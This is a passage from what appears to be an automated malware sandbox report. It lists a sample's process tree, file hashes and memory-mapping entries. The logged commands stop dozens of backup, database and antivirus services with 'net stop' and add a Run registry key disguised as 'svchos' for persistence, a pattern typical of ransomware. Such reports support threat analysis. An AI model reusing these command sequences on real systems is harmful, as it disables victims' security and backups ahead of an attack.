C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfefire /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\ZqqUZ.exe" /f4⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\ZqqUZ.exe" /f5⤵
- Adds Run key to start application
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ZqqUZ.exeMD5
c0202cf6aeab8437c638533d14563d35
SHA15767653494d05b3f3f38f1662a63335d09ae6489
SHA2568d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b
SHA51202516128d43914d6ff1b7e702d25771aafd2edccee1729f88ad621cea15a648bb2737b87f564e0711e6f8f99c43eb406b3b6137c68086774f1417642d51c07c0
-
C:\users\Public\ZqqUZ.exeMD5
c0202cf6aeab8437c638533d14563d35
SHA15767653494d05b3f3f38f1662a63335d09ae6489
SHA2568d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b
SHA51202516128d43914d6ff1b7e702d25771aafd2edccee1729f88ad621cea15a648bb2737b87f564e0711e6f8f99c43eb406b3b6137c68086774f1417642d51c07c0
-
memory/428-135-0x0000000000000000-mapping.dmp
-
memory/652-126-0x0000000000000000-mapping.dmp
-
memory/748-125-0x0000000000000000-mapping.dmp
-
memory/900-132-0x0000000000000000-mapping.dmp
-
memory/1016-128-0x0000000000000000-mapping.dmp
-
memory/1312-129-0x0000000000000000-mapping.dmp
-
memory/1804-123-0x0000000008D00000-0x0000000008D62000-memory.dmpFilesize
392KB
-
memory/1804-117-0x0000000000400000-0x0000000006E8E000-memory.dmpFilesize
106.6MB
-
memory/1804-124-0x0000000000400000-0x0000000006E8E000-memory.dmpFilesize
106.6MB
-
memory/1804-119-0x0000000000400000-0x0000000006E8E000-memory.dmpFilesize
106.6MB
-
memory/1804-118-0x00000000004036B0-mapping.dmp
-
memory/2108-131-0x0000000000000000-mapping.dmp
-
memory/2436-187-0x00007FF655520000-0x00007FF655556000-memory.dmpFilesize
216KB
-
memory/2588-120-0x0000000000000000-mapping.dmp
-
memory/2688-133-0x0000000000000000-mapping.dmp
-
memory/2760-154-0x0000000000000000-mapping.dmp
-
memory/3096-130-0x0000000000000000-mapping.dmp
-
memory/3856-127-0x0000000000000000-mapping.dmp
-
memory/3976-115-0x0000000000400000-0x0000000003754000-memory.dmpFilesize
51.3MB
-
memory/3976-116-0x0000000003EB0000-0x0000000003F1B000-memory.dmpFilesize
428KB
-
memory/3976-114-0x0000000003E00000-0x0000000003EA7000-memory.dmpFilesize
668KB
-
memory/3984-136-0x0000000000000000-mapping.dmp
-
memory/4004-134-0x0000000000000000-mapping.dmp
-
memory/4124-152-0x0000000000000000-mapping.dmp
-
memory/4164-137-0x0000000000000000-mapping.dmp
-
memory/4172-156-0x0000000000000000-mapping.dmp
-
memory/4216-138-0x0000000000000000-mapping.dmp
-
memory/4276-139-0x0000000000000000-mapping.dmp
-
memory/4328-140-0x0000000000000000-mapping.dmp
-
memory/4404-141-0x0000000000000000-mapping.dmp
-
memory/4460-142-0x0000000000000000-mapping.dmp
-
memory/4512-153-0x0000000000000000-mapping.dmp
-
memory/4528-143-0x0000000000000000-mapping.dmp
-
memory/4588-144-0x0000000000000000-mapping.dmp
-
memory/4656-145-0x0000000000000000-mapping.dmp
-
memory/4724-146-0x0000000000000000-mapping.dmp
-
memory/4792-147-0x0000000000000000-mapping.dmp
-
memory/4868-148-0x0000000000000000-mapping.dmp
-
memory/4944-149-0x0000000000000000-mapping.dmp
-
memory/4952-155-0x0000000000000000-mapping.dmp
-
memory/5012-150-0x0000000000000000-mapping.dmp
-
memory/5068-151-0x0000000000000000-mapping.dmp
-
memory/5152-157-0x0000000000000000-mapping.dmp
-
memory/5216-158-0x0000000000000000-mapping.dmp
-
memory/5276-159-0x0000000000000000-mapping.dmp
-
memory/5284-173-0x0000000000000000-mapping.dmp
-
memory/5332-160-0x0000000000000000-mapping.dmp
-
memory/5396-161-0x0000000000000000-mapping.dmp
-
memory/5444-162-0x0000000000000000-mapping.dmp
-
memory/5512-163-0x0000000000000000-mapping.dmp
-
memory/5588-164-0x0000000000000000-mapping.dmp
-
memory/5624-174-0x0000000000000000-mapping.dmp
-
memory/5660-165-0x0000000000000000-mapping.dmp
-
memory/5716-175-0x0000000000000000-mapping.dmp
-
memory/5720-166-0x0000000000000000-mapping.dmp
-
memory/5784-167-0x0000000000000000-mapping.dmp
-
memory/5844-178-0x0000000000000000-mapping.dmp
-
memory/5848-168-0x0000000000000000-mapping.dmp
-
memory/5856-176-0x0000000000000000-mapping.dmp
-
memory/5928-169-0x0000000000000000-mapping.dmp
-
memory/5992-170-0x0000000000000000-mapping.dmp
-
memory/6044-171-0x0000000000000000-mapping.dmp
-
memory/6108-172-0x0000000000000000-mapping.dmp
-
memory/6116-177-0x0000000000000000-mapping.dmp
-
memory/6188-179-0x0000000000000000-mapping.dmp
-
memory/6216-180-0x0000000000000000-mapping.dmp
-
memory/6288-181-0x0000000000000000-mapping.dmp
-
memory/6336-182-0x0000000000000000-mapping.dmp
-
memory/6368-183-0x0000000000000000-mapping.dmp
-
memory/6400-184-0x0000000000000000-mapping.dmp
-
memory/6460-185-0x0000000000000000-mapping.dmp
-
memory/6480-186-0x0000000000000000-mapping.dmp